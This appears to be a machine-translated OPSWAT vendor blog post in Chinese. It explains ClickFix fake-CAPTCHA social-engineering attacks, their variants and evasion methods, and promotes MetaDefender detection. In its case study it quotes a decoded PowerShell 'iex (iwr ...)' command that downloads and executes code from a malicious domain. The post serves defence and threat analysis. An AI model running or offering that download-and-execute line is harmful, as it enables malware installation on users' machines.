通过数据二极管发送日志、警报和遥测数据

了解详情
我们利用人工智能进行网站翻译,虽然我们力求准确,但不一定总是 100%精确。感谢您的理解。

在 ClickFix 攻击到达您的终端设备之前进行检测并阻止

MetaDefender 能够检测到 EDR 和静态扫描始终无法发现的 ClickFix 有效载荷
作者: OPSWAT
分享此贴

ClickFix 是一种社会工程学攻击技术,它诱使用户自行执行恶意命令,通常是通过将来自伪造的 CAPTCHA、浏览器错误或验证提示中的有效载荷复制并粘贴到 Windows“运行”对话框、PowerShell 或文件资源管理器中来实现的。由于是用户亲自执行命令,因此不会向传统防御系统发送任何恶意文件供其扫描,这使得有效载荷能够绕过电子邮件过滤器、静态杀毒软件以及大多数 EDR(端点检测与响应)工具。

这种结构性优势让攻击者获利颇丰,却给企业带来了巨大损失。微软报告称 ,过去一年中,其Defender专家团队收到的初始访问通知中,47%与ClickFix有关;而ESET的遥测数据显示, 2025年上半年此类攻击激增了517%。 Palo Alto Unit42的事件响应案例追踪了关键行业遭受的损失,其中高科技行业约有180起事件,金融服务行业140起,制造业130起,这些事件导致了凭证盗窃、邮件盗取以及全网勒索软件攻击。

2025年的一些典型攻击活动展现了攻击目标的广泛性,从Storm-1865冒充Booking.com针对酒店业组织发起攻击,到2025年3月流媒体服务商LES Automotive遭遇的供应链攻击——该攻击仅在一次攻击浪潮中就感染了100多个汽车经销商网站。

简而言之:关键要点

  • ClickFix 将攻击执行权移交给用户,从而绕过电子邮件过滤器、静态杀毒软件以及大多数 EDR 工具,因为系统不会收到任何需要扫描的恶意文件
  • 来自五个国家的五个国家支持的黑客组织,包括APT28、Kimsuky、MuddyWater、COLDRIVER和APT36,在约一年内纷纷采用ClickFix作为即插即用的替代方案,这表明其采用门槛极低
  • 地下论坛上每月售价200至1500美元的构建套件,使低级别的攻击者也能掌握可配置的诱饵、多语言支持、虚拟机规避以及绕过UAC(用户账户控制)的功能
  • ClickFix 与有效载荷无关,可通过同一感染链传播信息窃取器、RAT(远程访问木马)、加载器以及完整的勒索软件,这给安全运营中心(SOC)的分类处理带来了困难
  • FileFix 和 ConsentFix 等变种将攻击面从 Windows“运行”对话框扩展至文件资源管理器和身份验证层,从而绕过了密码密钥和抗钓鱼的多因素身份验证(MFA)
  • MetaDefender 能在 ClickFix 有效载荷到达终端设备之前将其检测出来,通过针对 50 多种文件类型的指令级仿真技术,有效规避传统沙箱无法识别的反虚拟机和基于时序的规避机制

什么是 ClickFix 攻击?

ClickFix 攻击是一种社会工程学技术,它将用户转化为执行层。攻击者不再通过附件或驱动式下载来传播恶意软件,而是展示一个看似合理的提示(例如伪造的验证码、浏览器错误、系统更新警告或验证步骤),并指示用户复制一条命令,然后将其粘贴到 Windows“运行”对话框、PowerShell 或其他执行环境中。用户误以为自己在执行合法的修复操作,从而亲自运行了有效载荷。

该技术分为三个步骤:

  1. 传播途径:钓鱼邮件、遭入侵的网站、恶意广告搜索结果或社交媒体帖子会将受害者引导至诱饵页面
  2. 社会工程学:诱饵伪装成值得信赖的品牌或系统提示,并迫使用户进行验证、修复或解锁操作
  3. 用户执行的有效载荷:用户将一条经过混淆的命令复制到剪贴板,然后将其粘贴到某个系统界面中,该界面会以用户的权限运行该命令

这在结构上与传统的网络钓鱼攻击截然不同。既没有需要引爆的附件,也没有需要拦截的驱动式下载。等到终端上出现可观察到的恶意活动时,它看起来已是一项合法的用户操作:用户输入了一条命令并按下了回车键。这就是自动化防御机制失效的原因。

ClickFix 还催生了两种并行的自我侵害类型:“自我感染”攻击,即用户直接执行恶意软件(这是 ClickFix 的原始模型);以及“自我诈骗”攻击,即通过社会工程学手段诱使用户协助实施欺诈,例如授权电汇、授予 OAuth(开放授权)许可,或安装远程支持工具。

ClickFix 为何能在威胁环境中迅速蔓延

在约18个月的时间里,ClickFix已从一项小众技术演变为一种主流的入侵途径。推动这一普及曲线的两大因素是:地下论坛上的商业化交易,以及国家行为体的验证。

商业化:自组装套件与地下论坛

ClickFix 构建套件在地下论坛上出现,每月售价在 200 至 1,500 美元之间。这些套件开箱即用,提供可配置的诱饵、多语言支持、虚拟机规避以及用户账户控制(UAC)绕过功能。这种套件化方案将准入门槛降至近乎为零,使得技术水平较低的攻击者也能开展此前需要定制工具才能进行的攻击活动。结果是,各层级的网络犯罪团伙的攻击规模都急剧扩大。

将 Nation-State 作为直接替代方案

在2024年10月至2025年1月这90天内,来自四个国家的五个已确认国家支持的黑客组织采用了ClickFix:俄罗斯的APT28、朝鲜的Kimsuky、伊朗的MuddyWater,以及与俄罗斯联邦安全局(FSB)有关联的COLDRIVER。 2025年5月,巴基斯坦的APT36(Transparent Tribe)也被确认,至此,来自五个国家的国家支持黑客组织总数达到五个。

关键的情报在于,这些APT(高级持续性威胁)并未围绕ClickFix构建新的攻击活动。它们只是将ClickFix替换到现有的执行阶段中,保留了原有的目标、基础设施和后续有效载荷。这种替换速度表明其采用门槛极低,这本身就是一种警示。任何成本低廉到足以让国家行为体将其投入实际行动的技术,都会迅速扩散到更广泛的威胁生态系统中。

ClickFix 的感染链是如何运作的?

ClickFix 的感染链分为三个明确的阶段,每个阶段都有其独特的检测机会和漏洞。

传播途径:电子邮件、遭入侵的网站、社交Media以及恶意广告

ClickFix 不受传播渠道限制。TA571仅通过一次活动,向超过 10 万个收件箱发送了 HTML 附件。ClearFake 大规模入侵了合法的 WordPress 网站。由 AI 生成的 TikTok 视频累计获得 50 万次观看,用于推广虚假的软件激活诱饵。被拦截的 ClickFix 诱饵页面中,五分之四来自搜索结果,而非电子邮件。这表明,Google 搜索上的恶意广告已成为主要的传播载体。

社会工程学:诱饵分类与着陆页类型

ClickFix 钓鱼网站将“信任层”与“着陆层”相结合。信任层通过冒充知名机构来借用品牌权威,包括 Booking.com、美国社会保障局、Facebook、Fortinet VPN 门户以及印度国防部。着陆层则会显示虚假的验证码、浏览器错误提示或用户验证提示。用户之所以会配合,是因为这些视觉提示看起来很熟悉,所暗示的权威来自机构,而且提示中还刻意营造了紧迫感。

执行环境:PowerShell、运行对话框和文件资源管理器

目前主要有三种执行途径。PowerShell 是最初的目标。随后是 Windows 的“运行”对话框,因为它对非技术用户而言界面更友好。2025 年年中,随着 FileFix 的出现,文件资源管理器的地址栏也加入了这一行列。该技术还具有跨平台特性:macOS 终端的变体使用 base64 编码的 curl 命令来获取并执行有效载荷。只要用户能够粘贴命令且系统会执行该命令,ClickFix 就能找到可乘之机。

ClickFix 提供哪些有效载荷?

ClickFix 对有效载荷不作区分。同一套分发和社交工程链既可用于凭证窃取、持久性远程访问,也可用于全网勒索软件攻击。这正是导致安全运营中心(SOC)分诊工作复杂化的原因:单一的检测模式可能对应截然不同的威胁后果,而针对信息窃取工具的响应方案,并不适用于勒索软件的前期攻击。

ClickFix 有效载荷类别与威胁后果

有效载荷类别

示例

威胁结果

信息窃取者

Lumma、StealC、Vidar、AMOS、Odyssey

凭证盗取、数据外泄

RATs

AsyncRAT、XWorm、NetSupport、VenomRAT

持久远程访问

装载机

DarkGate、Latrodectus、MintsLoader

多级有效载荷输送

勒索软件

互锁,麒麟

全网加密

后门程序

r77(已修改)

持久力、闪避

被滥用的RMM工具

ScreenConnect,级别

无需离开键盘即可操作

ClickFix 的发展历程

ClickFix 就像一块画布,威胁行为者不断在上面重新作画。随着防御者不断调整策略,攻击者则不断扩大攻击面,并将攻击推进到用户环境的新层级。

FileFix:从“运行”对话框到文件资源管理器

FileFix 将攻击入口从 Windows 的“运行”对话框转移到了文件资源管理器的地址栏。文件资源管理器是用户每天都会使用的工具,这降低了诱骗的门槛,并减少了“运行”对话框可能引发的警惕感。在 2025 年 7 月公开概念验证后的两周内,FileFix 就已出现在实际环境中

ClickFix 与 FileFix 对比一览

属性

点击修复

FileFix

执行目标

Windows“运行”对话框

文件资源管理器地址栏

用户熟悉度

不同寻常,令人起疑

熟悉,摩擦力更小

工艺链

Explorer.exe → PowerShell

浏览器 → PowerShell

GPO 阻止

相对简单

通过组策略(GPO)更难阻止

首次在野外发现

2024年3月

2025年7月(概念验证完成后两周)

ConsentFix:绕过密钥的身份层攻击

ConsentFix 将攻击完全从终端转移到了身份验证层。受害者先完成一次正常的 Microsoft 登录,随后将 OAuth 授权码粘贴到钓鱼页面中,从而授予攻击者对 Azure CLI(命令行界面)的访问权限。由于身份验证过程本身是真实的,因此该技术能够绕过密钥和抗钓鱼的多因素身份验证(MFA)。

2025年12月的一次攻击行动展现出了成熟的运作能力,包括在目标用户完成权限授予的瞬间,对所有钓鱼网站实施同步IP封锁,从而阻止了安全响应人员在调查过程中重现攻击流程。

还有哪些其他版本的ClickFix正在出现?

除 FileFix 和 ConsentFix 之外,还记录了另外四个变种:PromptFix、CrashFix、TerminalFix 和 DownloadFix。每个变种针对不同的执行环境或用户行为触发点。这种模式表明攻击者正在系统性地进行探索:威胁行为者正在逐一尝试操作系统和浏览器中所有可用的“粘贴并执行”环境,而变种目录也将持续扩大。

为什么传统防御措施对ClickFix无能为力

微软 Defender 专家报告称,尽管企业已部署了 EDR 系统,但每天仍有数千台企业设备因 ClickFix 活动而遭到入侵。这一失效源于架构层面的缺陷。EDR 虽然能监控进程行为,但当用户处于执行层时,恶意操作与合法用户操作便难以区分。静态扫描工具无法检测到文件,邮件过滤器也无法识别有效载荷。这种漏洞正是该技术设计所固有的。

ClickFix 是如何躲避检测的?

ClickFix 的规避机制在两个层面上运作:

在命令层面:跨变量拆分、Base64 编码、异或运算、字符串操作、注释和填充漏洞利用,以及嵌套执行。

在基础设施和有效载荷层面:在SharePoint和GitHub等可信平台上分阶段部署有效载荷、在JPG和PNG图像中进行隐写术、利用“现成二进制文件”(LOLBins)、通过浏览器本地缓存进行缓存走私,以及利用币安智能链(Binance Smart Chain)进行EtherHiding。检测措施必须同时针对这两个层面,才能真正有效。

如何在ClickFix攻击到达Endpoint之前将其检测出来

检测必须在安全链的尽可能早期进行。检测位置越靠后,响应成本就越高。三个层级各自提供了有效的拦截点:边界防护、终端防护以及文件执行前分析。

边界检测:扫描电子邮件附件(.eml 和 .msg 文件)、通过网络提供的 HTML 文件、嵌入的 URL 以及包含 ClickFix 链接页面的 PDF 文件。诱饵在传输链中被识别得越早越好;理想情况下,应在用户加载之前就将其识别出来。

Endpoint :RunMRU 注册表监控、剪贴板内容监控、进程树异常(浏览器调用 PowerShell)以及 PowerShell 脚本块日志记录,是用于捕获正在执行的进程或支持执行后取证分析的最有价值的信号。

Sandbox :在可疑的HTML诱饵、脚本和加载器到达用户端之前,先在基于模拟的沙箱中对其进行引爆,从而提取行为性IOC和与MITRE框架映射的TTP。由于此时尚未有进程执行,因此EDR无法生成这些信息。

实际案例:通过模拟技术捕获的 ClickFix HTML 诱饵

MetaDefender 沙箱模拟引擎近期分析的一个 HTML 示例展示了该技术的工作原理。文件horno-rafelet-es.html(SHA-256 19580e8669c730f634ce986955b23d021d5…)在所有四个检测层中均被标记为“已确认威胁”。

  • 诱饵:一个伪造的“验证您是人类”验证码页面,使用了谷歌reCAPTCHA的标志图片
  • 剪贴板有效载荷:POWerShell -W h,其中包含一个 Base64 编码的命令,解码后为 iex (iwr 'https://amazon-ny-gifts[.]com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content
  • 观察到的MITRE技术 :T1059.001 PowerShell、T1204 用户执行、T1027 去混淆/解码文件或信息、T1115 剪贴板数据
  • OSINT 判定:amazon-ny-gifts[.]com 被OPSWAT 标记为恶意网站
  • 检测路径:在暂存 URL 上检测到威胁声誉异常,沙箱模拟捕获到了隐蔽的剪贴板操作和 PowerShell 启动行为,综合威胁评分后判定为“已确认威胁”

该样本从未在真实终端上执行过。仅凭在分发前经过分析的HTML文件,安全人员就获得了阻止此次攻击活动所需的IOC和与MITRE分类对应的行为特征。

MetaDefender 在所有四个零日检测层中,均将 horno-rafelet-es.html(一个伪造的 CAPTCHA ClickFix 诱饵)标记为“已确认威胁”。

MetaDefender 如何检测 ClickFix 有效载荷

MetaDefender 是OPSWAT 推出的统一零日漏洞检测解决方案,专为识别能够绕过静态扫描、电子邮件过滤器和终端控制的隐蔽威胁(包括 ClickFix 有效载荷)而设计。该方案通过在用户接触诱饵之前对文件进行分析,从而弥补了这一结构性漏洞。

四层检测管道

  • 威胁声誉:每个文件都会与来自OPSWAT 全球情报网络的超过500 亿条入侵指标进行比对,从而在无需进行更深入分析的情况下,即可拦截已知的 ClickFix 诱饵和有效载荷哈希值
  • 威胁评分引擎 :将沙箱检测结果、信誉数据和行为指标整合为每个文件的单一可信度评分,从而消除导致安全运营中心(SOC)分诊效率低下的手动转接环节
  • ML相似性搜索:通过将新样本与已知的恶意软件家族和攻击活动进行聚类分析,即使有效载荷刚刚被打包或混淆,也能识别出FileFix、ConsentFix以及其他ClickFix变种
MetaDefender 四层恶意软件检测管道

这对 ClickFix 及类似攻击为何重要

  • 可捕获HTML诱饵页面、脚本以及多阶段加载器——由于尚未有进程执行,这些内容通常无法被EDR检测到
  • 提取行为指标(IOC)以及与MITRE ATT&CK框架映射的TTP(战术、技术和程序),供安全团队在SIEM和SOAR系统中进行关联分析
  • 针对每个文件提供单一、综合的判定结果,零日漏洞检测准确率高达99.9%,从而消除了耗费SOC时间的手动核对工作
  • 该功能可无缝集成MetaDefender Email Security、MFT 托管文件传输)、ICAP、Storage Security、Kiosk及跨域工作流中,确保进入该环境的每个文件都能接受相同的零日检测
  • 可在本地、云端或作为独立的MetaDefender SaaS 实例部署,适用于物理隔离和受监管的环境

ClickFix 并未消失。随着 FileFix 和 ConsentFix 等变种将攻击面扩展到终端控制措施无法覆盖的范围,结构性漏洞正在扩大。要弥补这一漏洞,需要一种能在用户察觉之前就发现有效载荷的检测机制。EDR 关注的是用户操作,而MetaDefender 关注的是有效载荷,并在有效载荷执行到达终端之前就对其进行分析。

了解OPSWAT MetaDefender 如何在 ClickFix 有效载荷、FileFix 变种及其他具有隐蔽性的零日威胁到达您的终端设备之前将其检测出来。与专家在线交流,共同分析您的环境。

常见问题

什么是 ClickFix 攻击?

ClickFix 攻击是一种社会工程学技巧,旨在诱使用户自行执行恶意命令。攻击者会展示伪造的验证码、浏览器错误或验证提示,指示用户将有效载荷复制到剪贴板,并将其粘贴到 Windows“运行”对话框、PowerShell 或文件资源管理器中。由于是用户主动执行命令,因此不会有恶意文件被传输出来供传统防御机制进行扫描。

ClickFix 是如何绕过 EDR 和杀毒软件的?

ClickFix 能够绕过 EDR 和杀毒软件,因为用户本身就是执行层。静态扫描器无法检测到任何恶意附件,EDR 也无法识别任何自动执行链,因为执行命令的是用户自身的进程。等到终端上出现行为信号时,该操作看起来已完全像是正常的用户活动。

ClickFix 和 FileFix 之间有什么区别?

ClickFix 针对的是 Windows 的“运行”对话框。FileFix 针对的是文件资源管理器的地址栏。文件资源管理器对普通用户来说更为熟悉,这降低了诱导阻力,而且 FileFix 更难通过组策略进行拦截。FileFix 在 2025 年 7 月公开概念验证后的两周内便已在实际环境中出现。

ClickFix会传播哪些恶意软件?

ClickFix 对有效载荷不作区分。 已记录的有效载荷包括信息窃取器(Lumma、StealC、Vidar、AMOS、Odyssey)、远程访问工具(AsyncRAT、XWorm、NetSupport、VenomRAT)、加载器(DarkGate、Latrodectus、MintsLoader)、勒索软件(Interlock、Qilin)、Rootkit 以及被滥用的远程监控管理工具(ScreenConnect、Level)。 相同的传播和社交工程链负责运送每一种。

组织如何检测和防范 ClickFix 攻击?

有效的检测机制分为三个层级:对电子邮件附件、HTML 文件和 URL 进行外围扫描;监控终端信号,例如 RunMRU 注册表监控、剪贴板内容以及 PowerShell 脚本块日志;以及零日文件分析,通过模拟 CPU 和操作系统行为,在有效载荷到达用户之前将其引爆。MetaDefender 提供第三层防护,针对 50 多种文件类型应用指令级仿真技术,从而破除 ClickFix 有效载荷所采用的反虚拟机和基于时序的规避机制。

标签

通过OPSWAT 了解最新信息!

立即注册,即可收到公司的最新动态、 故事、活动信息等。